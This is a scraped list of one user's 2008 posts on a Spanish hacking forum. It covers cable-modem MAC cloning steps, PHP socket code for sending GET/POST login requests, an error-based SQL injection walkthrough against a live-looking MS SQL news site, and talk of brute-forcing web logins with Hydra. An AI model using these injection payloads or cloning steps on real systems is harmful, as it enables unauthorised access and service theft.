| |
|
3
|
Informática / Tutoriales - Documentación / Re: Pasos detallados para clonar un Cablemodem
|
en: 16 Junio 2008, 19:45
|
4° Ya que crearon el vsWorks.st, abren el sbrider, y agregan ese archivo (el vsWorks.st), de manera que haya 3 archivos, que serian, el "netboot.exe", readme.txt, y el archivo agregado, el vsWorks.st 5° Ahora, abren el netboot.exe, y seleccionan, las casillas "Reset Modem Before Booting", Enable FTP Server, y la opcion de "Auto IP(2k and XP only), y donde dice "Adapter", seleccionan su tarjeta de red, que este conectada a Internet. 6° Ahora, le dan click a donde dice "boot over network", y esperan como 2 minutos. Abajo del netboot, les saldra el procedimiento que hace el programa, y cuando vean que sale, el "Ftp Disconnect" hacen el ultimo paso. 7° Cuando les salga ftp disconnect y su modem, este en "power", se meten rapidamente a la pagina http://192.168.100.1/07-nuevamacaddress NOTA: Si se meten a la pagina, y el fondo sale de color negro, que es lo como debe de salir, ya estara clonado. Para verificar que este clonado se meten a http://192.168.100.1/address.html, y veran que la mac, ya no es la misma. hola brother... fijate que tengo todos los pasos hechos pero no me funciona el cambio de mac..... me sale el fondo negro y todo.. pero me gustaria saber como cambio la mac... si hay mas opciones para cambiar la mac y cuantas veces puedo cambiarle la mac. el modem es motorola sb4100 saludos y gracias de antemano xDDDDD |
|
|
|
|
6
|
Programación / Desarrollo Web / dudas sobre php y javascript
|
en: 07 Mayo 2008, 07:58
|
hola.. tengo una duda... tengo un formulario..algo mas o menos asi <input name="numero" type="text" class="FORMULARIO" id="nombre" value="666" /> ahora lo que quiero... es hacer un script que si es arriba de 666 envie los datos por metodo get por php sino por javascript... saludos y gracias de antemano..... |
|
|
|
|
9
|
Programación / PHP / Re: envio de datos GET y POST (finales)
|
en: 24 Abril 2008, 19:52
|
un ejemplo con cURL o la clase Snoopy.... por favor... pero mi pregunta es de donde sacaste fputs($fp, "POST /login.php HTTP/1.1\r\n");
fputs($fp, "Host: www.ejemplo.com\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($parametros) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n"); una explicadita para saber como es.. |
|
|
|
|
10
|
Programación / PHP / envio de datos GET y POST (finales)
|
en: 23 Abril 2008, 07:02
|
bueno en teoria lo dije en este tema http://foro.elhacker.net/index.php/topic,206863.0.html pero ahora me gustaria que comenzaramos analizarlo bien, que cambia, que hay que agregarle, que esta de mas para enviar los datos perfectos Ejemplos:login.php por ejemplo <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>localhost</title> </head> <body> <form id="datos" name="datos" method="post" action=""> <label> <div align="center"> <?php $user=trim($_POST["user"]); $pass=trim($_POST["pass"]); //aqui el script ya sea de un foro o cualquier sitio //para loguiarse con las variables user y pass ?> <br /> <table width="237" height="94" border="1"> <tr> <td width="43"> </td> <td width="132"><div align="center">user <input name="user" type="text" id="user" size="10" /> <br /> pass <input name="pass" type="text" id="pass" size="10" /> <br /> <input type="submit" name="enviar" id="enviar" value="Enviar" /> </div></td> <td width="40"> </td> </tr> </table> <br /> </div></label> </form> </body> </html> ahora los el envio de datos seria asi: <?php
$da = fsockopen("www.example.com", 80);
$salida = "GET /login.php?user=satan69&pass=satan69 HTTP/1.1\r\n";
$salida .= "Host: www.example.com\r\n";
$salida .= "Connection: Close\r\n\r\n";
fwrite($da, $salida);
fclose($da);
?>
ese seria con metodo GET... ahora mi pregunta seria con metodo POST.. como seria..? poniendo el ejemplo del formulario de arriba ojo: no quiero hacer daño... simplemente saber como trabajan.... |
|
|
|
|
11
|
Seguridad Informática / Bugs y Exploits / Re: Duda con SQL injection
|
en: 22 Abril 2008, 03:57
|
Heme aqui de nuevo ( ¿que desgracia eh  ?) Bueno, vamos a ver: Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice: id=456+having+1=1 Y me produjo el siguiente error: [La columna 'noticias.ANTETITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY./code]
Asi que luego hice:
id=456+group+by+noticias.ANTETITULO+having+1=1
Y me salio:
[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.
/web/sp/index.asp, line 11 Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia: id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--
Me produjo el siguiente error: [Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE. Y ahi me quede, intente sacar la version con id=456+union+select+@@version,1,1,1,1 Y me dijo: [Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulación urbanística como la principal amenaza del medio ambiente en España' para una columna de tipo de datos int. Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes. Gracias de antemano, y un saludo [/code] es asi la onda: id=1' having 1=1-- ayi tira el error... y la mayor veces te muestra los campos y el nombre de la tabla |
|
|
|
|
15
|
Seguridad Informática / Hacking Básico / Re: Auditoría de Passwords contra aplicaciones Web
|
en: 10 Abril 2008, 03:31
|
Exactamente ... como bien dice satan69, eso serian dos ejemplos de conexion GET y POST. Como ves, en ambos casos se podria hacer un bruteforce y, en ambos casos, tendrias que hacer un estudio de lo que devuelve (OK o ERROR) analizando la pagina.
SiD#(0), Supongo que no hara falta que te diga que cada envio que hagas queda registrado en el log del servidor y que hacer un ataque de fuerza bruta es un delito
Efectivamente no hace falta que me digas nada  pq mis intenciones son unicamente las de entender el funcionamiento de los formularios y sus contramedidas ante ataques de fuerza bruta o diccionario. Echaré un vistazo a los ejemplos de código de formularios para probar reacciones de la aplicación web como el comportamiento de THC Hydra, Brutus Etc... Es un tema que me interesa y del que necesito aprender cosas. Gracias por los ejemplos  no hay problema... estamos para ayudarte... |
|
|
|
|
|
| |
|
Mostrar Mensajes
